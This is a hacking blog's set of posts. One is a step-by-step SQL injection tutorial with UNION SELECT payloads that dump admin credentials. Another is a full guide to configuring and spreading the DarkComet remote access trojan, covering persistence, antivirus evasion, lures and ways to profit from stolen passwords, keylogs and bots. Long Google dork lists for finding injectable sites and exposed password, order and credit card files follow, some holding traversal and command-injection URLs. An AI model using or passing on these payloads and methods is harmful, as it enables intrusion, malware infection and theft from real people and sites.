Sunday, 20 April 2014

[Tutorial] SQL Injection (SQLi)

n this tutorial I'm going to discuss SQL Injection. SQLi is one of the popular web application hacking methods. Using an SQL Injection attack, an unauthorized person can access the database of the website. Attackers can extract the data from the Database.

What can a hacker do during and after an SQLi attack?

*ByPassing Logins
*Accessing secret data
*Modifying and defacing the website
*Shutting down the MySQL server

So, here we go.

Step 1: Finding Vulnerable Websites

To find a SQLi vulnerable website, you can use Google search by searching for certain keywords. Those keywords are often regerred as ''Google Dork''. 
Spoiler (Click to Hide)
Code:
inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=



Copy one of the above keywords and paste it in the Google Search engine. We'll get alot of results. We have to visit these websites one by one to check if they are vulnerable. 

Spoiler (Click to Hide)
[Image: 314fb9160af31558daf23d42276652cd.png]

Step 2: Checking for Vulnerability

Now let's check if the target website is vulnerable to an SQLi attack. To check the vulnerability, add the single quotes (') at the end of the url and hit enter.

Code:
http://www.victimsite.com/index.php?id=2'

If the page remains in the same page or shows that the page is not found, then it's not vulnerable.

If you get an error like shown below, it means the website is actually vulnerable.

Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

Step 3: Finding the number of columns:

Great, so we've found a website that is vulnerable to SQLi attacks. Our next step is to find the number of columns present in the targets database. 

To do that, replace the single quotes with the ''order by #'' statement.

Change the # from 1, to 2, 3, 4, 5, 6, Untill you get the ''unknown column'' error.

Code:
http://www.victimsite.com/index.php?id=2 order by 1
http://www.victimsite.com/index.php?id=2 order by 2
http://www.victimsite.com/index.php?id=2 order by 3
http://www.victimsite.com/index.php?id=2 order by 4

If you get an error while trying the 8th number (the X amount), then the number of the last column is x-1.

If the above method fails to work for you, then try to add the ''--'' at the end of the statement.

Code:
http://www.victimsite.com/index.php?id=2 order by 1--

Step 4: Find the vulnerable columns:

We have successfully discovered the number of columns present in the target database. Let's find the vulnerable column by trying the query ''union select columns_sequence''.

Change the id value to negative, so change it to id=2. Replace the columns_sequence with the number from 1 to x-1 (Number of columns) separated with commas.

For example, if the number of columns is 7, then the query is as the following: 

Code:
http://www.victimsite.com/index.php?id=-2 union select 1,2,3,4,5,6,7--

If the above method is not working, use this:

Code:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7--

Once you execute the query, it will display the vulnerable column.

Spoiler (Click to View)

We're going to choose the ''admin'' table.

Step 7: Finding the column name

Now we're going to replace the ''group_concat(table_name)'' with the ''group_concat(column_name)''

Replace the "from information_schema.tables where table_schema=database()--" with "FROM information_schema.columns WHERE table_name=mysqlchar--

We have to convert the table name to MySQL CHAR() string.

So in order to do that, we need the HackBar add-on. Click here to install the Mozilla Firefox HackBar add-on.

Once you've installed the add-on, you can see a toolbar that wil look like the following one. If you're not able to see the Hackbar, press F9.

Select SQL -> MySQL -> MySQLChar() in the hackbar.

Spoiler (Click to View)

It will ask you to enter string that you want to convert into MySQLCHAR(). We want to convert the table name to MySQLChar. In our case the table name is ''admin''.

Spoiler (Click to View)

Now you can see the CHAR (Numbers separated with comma's) in the hack toolbar. Copy and paste the code at the end of the url instead of the ''mysqlchar''.

For example:
Code:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--

The above query will display the list of columns.

For example: admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pas​ ​ s,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password..​etc.

Now replace the replace group_concat(column_name) with group_concat(columnname1,0x3a,anothercolumnname2).

Code:
http://www.victimsite.com/index.php?id=-2
and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from admin--

If the above query displays the ''column is not found'' error, then try another column name from the list.

If we are lucky, it will display the data stored in the database depending on your column name. For instance, username and password column will display the login credentials stored in the database.

Step 8: Finding the admin panel

Just try to access the admin panel with urls like below.
Code:
http://www.victimsite.com/admin.php
http://www.victimsite.com/admin/
http://www.victimsite.com/admin.html
http://www.victimsite.com:2082/

If you're lucky, you'll find the admin page using the above urls. You can use some kind of admin finder tools aswell.

This was everything, I hope you've learnt something from it and that you enjoyed reading it. If I explained something wrong, please correct me in the comments.
Posted by at No comments:

(TUT) How to Setup Darkcomet 5.3.1 ~ [FULL Guide to DarkComet]

Hello and welcome to this tutorial on how to setup Darkcomet, this is going to be a nice average sized guide providing you with all the information needed to successfully run and manage the Darkcomet tool. There will be pictures, examples, step by step pieces and a lot more.

What Is DarkcometSo the best way to start off your guide would be to explain what you will be working with first. So I will give you a quick explanation of Darkcomet, what it is and how it works. Darkcomet is a Remote Access Trojan or Remote Administration Tool. it is used mainly to gain access of a victim's PC but there are many uses for a RAT, I will provide most of them.
  • Ability to control and view screen
  • File management (Upload, Execute, Download, etc)
  • Shell Access (CMD)
  • Computer Power Access (Power off, log off, etc)
  • Host and Registry control
  • Keystroke viewing and control
  • Network Monitoring (Wifi, View local PC's, etc)
  • Password access on Chrome, Firefox, Opera, Safari and IE
  • Task Manager Access
(To See Full List, Open Spoiler)
Spoiler (Click to View)

Darkcomet can be used for malicious intent, or for a prank. Many cyber criminals use RAT's like darkcomet to steal and log passwords, credit cards and more. There is a wholemarketplace behind RAT's, it's mostly around botnets but RAT's are in the business too. People can make lot's of money with bots, they can use them to DDoS and make a DDoSservice, steal their passwords, make shops and sell their accounts, keylog and sell logs, then sell the bots in a bot shop and a lot more.

Requirements
Okay so to have this correctly setup you are going to need a few simple requirements, I will list them below.
  1. Access to portforwarding (Your Router user and pass)
  2. Darkcomet (Download Here)
  3. No-ip / DUC (Download Here)
  4. Winrar or 7Zip


Tutorial
Okay so once you got all of the requirements and are ready to proceed, continue to this step by step tutorial and I will show you everything you need to know!

Darkcomet - Section 1

Installing, setting up and preparing Darkcomet - Darkcomet Section 1.1
1. Extract the darkcomet folder (VERY IMPORTANT)
2. Open Darkcomet.exe
3. Agree to the EULA, terms, etc
It should look like this: Click Here For Picture

Portforwarding - Section 1
Okay so like I said, you need access to your router, otherwise you won't be able to portforward. You could still use an HTTP rat like "Loki Rat" if you don't want to portforward. Although if you want to go through all that trouble uploading the files to your FTP server and all that, you might as well go with an HTTP botnet like Cythosia, but let's get started.

Finding your Router Gateway Address - Portforwarding Section 1.1
1. Open your start menu
2. Search for "CMD" or Open "RUN" and type "CMD" on it.
3. Enter this code into your Command Prompt: "ipconfig"
4. Scroll all the way up and look for "Default Gateway" and "IPv4 Address"
(We will need IPv4 Address later)

Forwarding your Port - Portforwarding Section 1.2
5. Enter the Default Gateway IP into your URL bar
6. Login to your router, if you don't know your account search for some default logins.
7. Look for a portforwarding section (Might be in a gaming tab, every router is different)
8. Type "1604" on both "Starting Port" and "Ending Port"
9. For "Protocol" try "Both" but if there's only TCP and UDP, do both seperately
10. For "IP Address" get your IPv4 Address and enter it there
11. Enable the port and press submit

Allowing Port through Firewall - Portforwarding Section 1.3
1. Open Start menu and search "Firewall"
2. Click "Windows Firewall with Advance Security"
3. Go to "Incoming Connections" and click "New Rule"
4. Select "Port" and press the next button
5. Choose "UDP" and select "Specific Local Ports" and enter "1604"
6. Allow the connection and press next until you get to "Name"
7. Name is "darkcomet" or whatever, and give it any description
8. Click Finish and repeat it again for inbound connection but with "TCP" Port.
9. Repeat steps 1-8 but with "Outbound Connection"
10. Also you should check with your Antivirus firewall just in case.[/b]

Darkcomet - Section 2

Connecting and configuring Darkcomet - Darkcomet Section 2.1
1. Open Darkcomet.exe
2. Go to Socket / Net Section
3. Right click and press "Add port to listen to"
4. Make the Listen Port "1604" and enable "UPnP"
5. Click Listen and you have configured Darkcomet

Creating A Server (Stub/Virus) - Darkcomet Section 2.2
Okay now you will be making the virus that you will get users to run in order to infect them, there are many features on Darkcomet so I will take you through them.

1. Open Darkcomet Menu on top right corner
2 Go to Server Module and click Expert.
(If you want a list of what all the features do, read below)

Main Settings
Security Password - Adds a password so only you can manage bots
Mutex - Stops multiple connections on the same port
Server ID - The ID or Group bots that run this server are in
Profile Name - You can save your settings under a profile name
Process Hijacking - Firewall Bypass, not recommended if crypting (outdated)

Network Settings
IP/DNS - The DNS or IP Address bots will connect to
Port - Port bots will use to connect
Add - This will add the settings, remember to click this!
Also remember to click the added setting once added

Module Startup
Startup - Starts the stub with windows
Drop File in - Where the virus will be placed
Melt File - Deletes the virus execution file, but keeps virus after running
Date Created - Change the creation date to trick users
Persistence - Very important, keeps the program task from being removed

Install Message
This is basically where you make a fake error message when your virus starts to make it seem more legitimate.
Icon - Choose which img comes with the error, I suggest the "X" icon.
Title - What it says at the top of the error message (I.E "Error 804")
Message - What the actual error says "Warning, an unexpected error has occurred, program will now be terminated"
Test Messagebox - You can test the error on yourself, it is harmless and you can do it just to be sure

Module Shield
Persistent Process - Again, persistence for more than task manager, recommended.
EVERYTHING ELSE IF NOT RECOMMENDED AND IS OUTDATED IN THE MODULE SHIELD SECTION

KeyloggerHostsBinder, and Icon
Keylogger is able to send logged keys to a website through FTP connection.
You can manage a victim's "Hosts.txt" file through here and control which websites he can go on.
Bind a file with your server so they both run at the same time, this will make the user less suspicious.
Change icon of file to make it more legitimate and cause less suspicion.

DUC / No-iP - DNS Config Section 1

Creating a No-IP Account - DNS Config Section 1.1
1. Go to http://www.noip.com/newUser.php and register
2. Create a "No-ip.biz" hostname with any name you want
3. Click "No thanks, I'll use no-ip.biz" and click "Sign Up"
4. Validate your Email and Activate your Account

Configuring DUC - DNS Config Section 1.2
1. Open No/IP DUC and log into your No/Ip Account
2. Click "Edit Hosts" on the DUC Menu
3. Select your no-ip.biz website and click "Save"
4. Click Refresh Now and you're good to go!
5. Click File>Hide to get all of that out of your way

Setting up DUC or No/IP with Darkcomet - DNS Config Section 1.3
1. Open Dark Comet and click the drop down menu (Top right corner)
2. Click Server Module > Full Editor (Expert)
3. Use the Previous tips to setup your stub but leave the "Network Settings" alone
4. Instead of your IP address, enter your No/IP Website (DNS) and port "1604"
5. Press the "Add" button and click on it to select it
6. Finish your settings and press build stub

Tips and Tricks

Spreading
Spreading is basically a method to sending your server (virus) to a bunch of victims. This can be done best through a "Niche" which is basically a topic that a large amount of people are interested in, for example "Minecraft". You can make a Youtube Video about a "Minecraft Mass LastLogin Stealer" or something of the sorts, and spread your server. You can also do JDB's (Java Drive By) and use things like "Adult Cams" to attract and infect pedo's and pervs.

Crypting
Always be sure to crypt your file, this is when you edit the code of your virus to make it undectable (FUD) by antiviruses, this will durastically increase your spreading rates. You can buy a crypter from HF, use free ones or try using tools like obfuscation or hex editing to crypt it yourself. Always remember not to upload to av scanning websites that distribute your file otherwise it will become less UD, do NOT use "Virustotal" or "Novirusthanks". Instead you should use "Element Scanner". The best website to upload to would be: http://ge.tt

Money
You can make money through your bots in a lot of ways, so I will explain some of them.

1. Steal passwords and sell accounts
2. Bitcoin/Litecoin Mining
3. Sell DDoS service
4. Keylog and sell logs
5. Sell the bots themselves
(Be creative, these were just the ways i could think off the top of my head)

That is it for my tutorial for now, I hope you enjoy and thank you for reading. Please give me feedback on what you thought about this and how I should improve it, thanks!
Posted by at No comments:

Thursday, 9 June 2011

Use any of these search query in google to find the website vulnerable to SQL injection. Try to check vulnerability and get its detail by many SQL injection tricks.

inurl:index.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:games.php?id=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:category.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:shopping.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:art.php?idm=
inurl:title.php?id=
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:declaration_more.php?decl_id=
inurl:games.php?id=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:shop_category.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:art.php?idm=
inurl:title.php?id=
inurl: info.php?id=
inurl :pro.php?id= 
Posted by at No comments:

google search hacking


Google search Hacking 3
1. “Index of /admin”
2. “Index of /password”
3. “Index of /mail”
4. “Index of /” +passwd
5. “Index of /” +password.txt
6. “Index of /” +.htaccess
7. index of ftp +.mdb allinurl:/cgi-bin/ +mailto
8. administrators.pwd.index
9. authors.pwd.index
10. service.pwd.index
11. filetype:config web
12. gobal.asax index
13. allintitle: “index of/admin”
14. allintitle: “index of/root”
15. allintitle: sensitive filetype:doc
16. allintitle: restricted filetype :mail
17. allintitle: restricted filetype:doc site:gov
18. inurlasswd filetype:txt
19. inurl:admin filetype:db
20. inurl:iisadmin
21. inurl:”auth_user_file.txt”
22. inurl:”wwwroot/*.”
23. top secret site:mil
24. confidential site:mil
25. allinurl: winnt/system32/ (get cmd.exe)
26. allinurl:/bash_history
27. intitle:”Index of” .sh_history
28. intitle:”Index of” .bash_history
29. intitle:”index of” passwd
30. intitle:”index of” people.lst
31. intitle:”index of” pwd.db
32. intitle:”index of” etc/shadow
33. intitle:”index of” spwd
34. intitle:”index of” master.passwd
35. intitle:”index of” htpasswd
36. intitle:”index of” members OR accounts
37. intitle:”index of” user_carts OR user_cart
38. ALTERNATIVE INPUTS====================
39. _vti_inf.html
40. service.pwd
41. users.pwd
42. authors.pwd
43. administrators.pwd
44. shtml.dll
45. shtml.exe
46. fpcount.exe
47. default.asp
48. showcode.asp
49. sendmail.cfm
50. getFile.cfm
51. imagemap.exe
52. test.bat
53. msadcs.dll
54. htimage.exe
55. counter.exe
56. browser.inc
57. hello.bat
58. default.aspdvwssr.dll
59. cart32.exe
60. add.exe
61. index.jsp
62. SessionServlet
63. shtml.dll
64. index.cfm
65. page.cfm
66. shtml.exe
67. web_store.cgi
68. shop.cgi
69. upload.asp
70. default.asp
71. pbserver.dll
72. phf
73. test-cgi
74. finger
75. Count.cgi
76. jj
77. php.cgi
78. php
79. nph-test-cgi
80. handler
81. webdist.cgi
82. webgais
83. websendmail
84. faxsurvey
85. htmlscript
86. perl.exe
87. wwwboard.pl
88. www-sql
89. view-source
90. campas
91. aglimpse
92. glimpse
93. man.sh
94. AT-admin.cgi
95. AT-generate.cgi
96. filemail.pl
97. maillist.pl
98. info2www
99. files.pl
100. bnbform.cgi
101. survey.cgi
102. classifieds.cgi
103. wrap
104. cgiwrap
105. edit.pl
106. perl
107. names.nsf
108. webgais
109. dumpenv.pl
110. test.cgi
111. submit.cgi
112. guestbook.cgi
113. guestbook.pl
114. cachemgr.cgi
115. responder.cgi
116. perlshop.cgi
117. query
118. w3-msql
119. plusmail
120. htsearch
121. infosrch.cgi
122. publisher
123. ultraboard.cgi
124. db.cgi
125. formmail.cgi
126. allmanage.pl
127. ssi
128. adpassword.txt
129. redirect.cgi
130. cvsweb.cgi
131. login.jsp
132. dbconnect.inc
133. admin
134. htgrep
135. wais.pl
136. amadmin.pl
137. subscribe.pl
138. news.cgi
139. auctionweaver.pl
140. .htpasswd
141. acid_main.php
142. access.log
143. log.htm
144. log.html
145. log.txt
146. logfile
147. logfile.htm
148. logfile.html
149. logfile.txt
150. logger.html
151. stat.htm
152. stats.htm
153. stats.html
154. stats.txt
155. webaccess.htm
156. wwwstats.html
157. source.asp
158. perl
159. mailto.cgi
160. YaBB.pl
161. mailform.pl
162. cached_feed.cgi
163. global.cgi
164. Search.pl
165. build.cgi
166. common.php
167. show
168. global.inc
169. ad.cgi
170. WSFTP.LOG
171. index.html~
172. index.php~
173. index.html.bak
174. index.php.bak
175. print.cgi
176. register.cgi
177. webdriver
178. bbs_forum.cgi
179. mysql.class
180. sendmail.inc
181. CrazyWWWBoard.cgi
182. search.pl
183. way-board.cgi
184. webpage.cgi
185. pwd.dat
186. adcycle
187. post-query
188. help.cgi
189. /robots.txt
190. /admin.mdb
191. /shopping.mdb
192. /arg;
193. /stats/styles.css
194. /statshelp.htm
195. /favicon.ico
196. /stats/admin.mdb
197. /shopdbtest.asp
198. /cgi-bin/test.cgi
199. /cgi-bin/test.pl
200. /cgi-bin/env.cgi
201. /photos/protest/styles.css
202. http://hpcgi1.nifty.com/trino/ProxyJ/prxjdg.cgi
203. /cgi-bin/whereami.cgi
204. /shopping400.mdb
205. /cgi/test.cgi
206. /cgi-bin/test2.pl
207. /photos/protest/kingmarch_02.html
208. /chevy/index.htm
209. /cgi-bin/glocation.cgi
210. /cgi-bin/test2.cgi
211. /ccbill/glocation.cgi
212. /cgi-bin/styles.css
213. /shopping350.mdb
214. /cgi-bin/shopper.cgi
215. /shopadmin.asp
216. /news_2003-02-27.htm
217. /cgi-bin/whois.cgi
218. 3 /cgi-bin/calendar.pl
219. 3 /cgi-bin/calendar/calendar.pl
220. 3 /cgibin/styles.css
221. 3 /venem.htm
222. 2 /stats/www.newbauersflowers.com/stats/04-refers.htm
223. 2 /cgi-bin/where.pl
224. 2 /cgibin/shopper.cgi&TEMPLATE=ORDER.LOG
225. 2 /cgibin/recon.cgi
226. 2 /cgibin/test.cgi
227. 2 /WebShop/templates/styles.css
228. 2 /stats/shopping350.mdb
229. 2 /cgi-bin/mailform.cgi
230. 2 /cgi-bin/recon.cgi
231. 2 /chevy
232. 2 /cgi-bin/servinfo.cgi
233. 2 /acart2_0.mdb
234. 2 /cgi-bin/where.cgi
235. 2 /chevy/
236. 2 /stats/www.savethemall.net/stats/19-refers.htm
237. 2 /ccbill/secure/ccbill.log
238. 2 /cgi/recon.cgi
239. 2 /stats/www.gregoryflynn.com/chevy
240. 2 /ibill/glocation.cgi
241. 2 /ccbill/whereami.cgi
242. 2 /ibill/whereami.cgi
243. 2 /apps_trial.htm
244. 2 /cgi-bin/lancelot/recon.cgi
245. 2 /cgi-bin/DCShop/Orders/styles.css
246. 1 /cgi-bin/htmanage.cgi
247. 1 /stats/www.tysons.net/stats/05-refers.htm
248. 1 /cgi-bin/mastergate/add.cgi
249. 1 /cgi-bin/openjournal.cgi
250. 1 /cgi-bin/calendar/calendar_admin.pl
251. 1 /cgibin/ibill/count.cgi
252. 1 /cgi-bin/nbmember2.cgi
253. 1 /cgi-bin/mastergate/count.cgi
254. 1 /cgi-bin/mastergate/accountcreate.cgi
255. 1 /cgi-bin/ibill/accountcreate.cgi
256. 1 /cgibin/MasterGate2/count.cgi
257. 1 /cgi-bin/amadmin.pl
258. 1 /cgibin/mailform.cgi
259. 1 /cgibin/mastergate/count.cgi
260. 1 /cgibin/harvestor.cgi
261. 1 /cgibin/igate/count.cgi
262. 1 /WebShop
263. 1 /shopdisplaycategories.asp
264. 1 /cgi-bin/DCShop/Orders/orders.txt
265. 1 /cgi-bill/revshare/joinpage.cgi
266. 1 /stats/www.gregoryflynn.com/stats/19-refers.htm
267. 1 /cgi-local/DCShop/auth_data/styles.css
268. 1 /cgi-bin/add-passwd.cgi
269. 1 /cgi-bin/MasterGate/count.cgi
270. 1 /apps_shop.htm%20/comersus/database/comersus.mdb
271. 1 /data/verotellog.txt
272. 1 /epwd/ws_ftp.log
273. 1 /stats/www.dialacure.com/stats/16-refers.htm
274. 1 /cgi/MasterGate2/count.cgi
275. 1 /jump/rsn.tmus/skybox;sz=140×150;segment=all;resor=jackson;state= WY;sect=home;tile=8;ord=57019
276. 1 /wwii/styles.css
277. 1 /cgi-bin/admin.mdb
278. 1 /stats/www.gregoryflynn.com/stats/31-refers.htm
279. 1 /cgi-bin/ibill-tools/count.cgi
280. 1 /WebShop/templates/cc.txt
281. 1 /cgibin/ibill/accountcreate.cgi
282. 1 /cgi-bin/count.cgi
283. 1 /cgi-local/DCShop/auth_data/auth_user_file.txt
284. 1 /cgi/mastergate/count.cgi
285. 1 /cgi-bin/EuroDebit/addusr.pl
286. 1 /cgi-bin/dbm-passwd.cgi
287. 1 /cgi/igate/accountcreate.cgi
288. 1 /cgi-bin/store/Log_files/your_order.log
289. store/log_files/your_order.log
290. /cgi-bin/DCShop/Orders/orders.txt
291. /vpasp/shopdbtest.asp
292. /orders/checks.txt
293. /WebShop/logs
294. /ccbill/secure/ccbill.log
295. /scripts/cart32.exe
296. /cvv2.txt
297. /cart/shopdbtest.asp
298. /cgi-win/cart.pl
299. /shopdbtest.asp
300. /WebShop/logs/cc.txt
301. /cgi-local/cart.pl
302. /PDG_Cart/order.log
303. /config/datasources/expire.mdb
304. /cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.loghtml
305. /orders/orders.txt
306. /cgis/cart.pl
307. /webcart/carts
308. /cgi-bin/cart32.exe/cart32clientlist
309. /cgi/cart.pl
310. /comersus/database/comersus.mdb
311. /WebShop/templates/cc.txt
312. /Admin_files/order.log
313. /orders/mountain.cfg
314. /cgi-sys/cart.pl
315. /scripts/cart.pl
316. /htbin/cart.pl
317. /productcart/database/EIPC.mdb
318. /shoponline/fpdb/shop.mdb
319. /config/datasources/myorder.mdb
320. /PDG_Cart/shopper.conf
321. /shopping/database/metacart.mdb
322. /bin/cart.pl
323. /cgi-bin/cart32.ini
324. /database/comersus.mdb
325. /cgi-local/medstore/loadpage.cgi?user_id=id&file=data/orders.txt
326. /cgi-bin/store/Admin_files/myorderlog.txt
327. /cgi-bin/orders.txt
328. /cgi-bin/store/Admin_files/your_order.log
329. /test/test.txt
330. /fpdb/shop.mdb
331. /cgibin/shop/orders/orders.txt
332. /shopadmin1.asp
333. /cgi-bin/shop.cgi
334. /cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi
335. /cgi-bin/PDG_cart/card.txt
336. /shopper.cgi?preadd=action&key=PROFA&template=order1.log
337. /store/shopdbtest.asp
338. /log_files/your_order.log
339. /_database/expire.mdb
340. /HyperStat/stat_what.log
341. /cgibin/DCShop/auth_data/auth_user_file.txt
342. /htbin/orders/orders.txt
343. /SHOP/shopadmin.asp
344. /index.cgi?page=../admin/files/order.log
345. /vpshop/shopadmin.asp
346. /webcart/config
347. /PDG/order.txt
348. /cgi-bin/shopper.cgi
349. /orders/order.log
350. /orders/db/zzzbizorders.log.html
351. /easylog/easylog.html
352. /cgi-bin/store/Log_files/your_order.log
353. /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=shopping400.mdb
354. /comersus_message.asp?
355. /orders/import.txt
356. /htbin/DCShop/auth_data/auth_user_file.txt
357. /admin/html_lib.pl
358. /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=myorder.txt
359. /cgi-bin/DCShop/auth_data/auth_user_file.txt
360. /cgi-bin/shop.pl/page=;cat%20shop.pl
361. /cgi-bin/shopper?search=action&keywords=dhenzuser%20&template=order.log
362. /HBill/htpasswd
363. /bin/shop/auth_data/auth_user_file.txt
364. /cgi-bin/cs/shopdbtest.asp
365. /mysql/shopping.mdb
366. /Catalog/config/datasources/Products.mdb
367. /trafficlog
368. /cgi/orders/orders.txt
369. /cgi-local/PDG_Cart/shopper.conf
370. /store/cgi-bin/Admin_files/expire.mdb
371. /derbyteccgi/shopper.cgi?key=SC7021&preadd=action&template=order.log
372. /derbyteccgi/shopper.cgi?search=action&keywords=moron&template=order.log
373. /cgi-bin/mc.txt
374. /cgi-bin/mall2000.cgi
375. /cgi-win/DCShop/auth_data/auth_user_file.txt
376. /cgi-bin/shopper.cgi?search=action&keywords=root%20&template=order.log
377. /store/commerce.cgi
378. /scripts/shop/orders/orders.txt
379. /product/shopping350.mdb
380. /super_stats/access_logs
381. /cgi-local/orders/orders.txt
382. /cgi-bin/PDG_Cart/mc.txt
383. /cgibin/cart32.exe
384. /cgi-bin/Shopper.exe?search=action&keywords=psiber%20&template=other/risinglogorder.log
385. /cgibin/password.txt
386. /Catalog/cart/carttrial.dat
387. /catalog/Admin/Admin.asp
388. /ecommerce/admin/user/admin.asp
389. /data/productcart/database/EIPC.mdb
390. /store/admin_files/commerce_user_lib.pl
391. /cgi-bin/store/index.cgi
392. /paynet.txt
